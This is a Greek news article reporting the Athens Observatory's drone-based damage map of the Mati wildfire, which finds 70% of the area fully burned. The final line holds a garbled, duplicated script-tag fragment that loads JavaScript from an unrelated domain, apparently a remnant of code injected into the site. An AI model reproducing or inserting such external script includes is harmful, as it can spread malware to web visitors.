Η αποτίμηση της καταστροφής στο Μάτι

Εικόνες βιβλικής καταστροφής στο Μάτι από ψηλά | in.gr

Το μέγεθος της καταστροφής που έχει συντελεσθεί στο Μάτι απ’ την πρόσφατη πυρκαγιά αποτυπώνει νέος λεπτομερής χάρτης του Αστεροσκοπείου Αθηνών, σύμφωνα με τον οποίο το 70% έχει καεί πλήρως.

Αναλύοντας τις αεροφωτογραφίες, οι οποίες ελήφθησαν 2 ημέρες μετά την πυρκαγιά, το Κέντρο Διαχείρισης Φυσικών Καταστροφών BEYOND του Ινστιτούτου Αστρονομίας, Αστροφυσικής, Διαστημικών Εφαρμογών & Τηλεπισκόπησης (ΙΑΑΔΕΤ) του Εθνικού Αστεροσκοπείου Αθηνών καταλήγει σε ένα συμπέρασμα αρκετά αποκαρδιωτικό, αφού μερικώς καμένες ή μη καμένες είναι το 30% των εκτάσεων της περιοχής.

Εθνικό Αστεροσκοπείο Αθηνών

Όπως αναφέρεται σε σχετική ανακοίνωση, ο χάρτης καλύπτει συνολική έκταση 4.318 στρεμμάτων, και συντάχθηκε με αξιοποίηση των αεροφωτογραφιών υπερυψηλής ανάλυσης που ελήφθησαν στις 25/07/2018 με χρήση Συστημάτων μη Επανδρωμένου Αεροσκάφους (ΣμηΕΑ)/UAV τύπου Falcon, σε συνεργασία με την εταιρεία Άρτεμις-Aerosurvey.

Ο σκοπός του χάρτη αυτού είναι να παρέχει χρήσιμες πληροφορίες για τις ανάγκες των υπηρεσιών του Υπουργείου Υποδομών και Μεταφορών με σκοπό την διαχείριση και αποκατάσταση των κατεστραμμένων ιδιοκτησιών.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>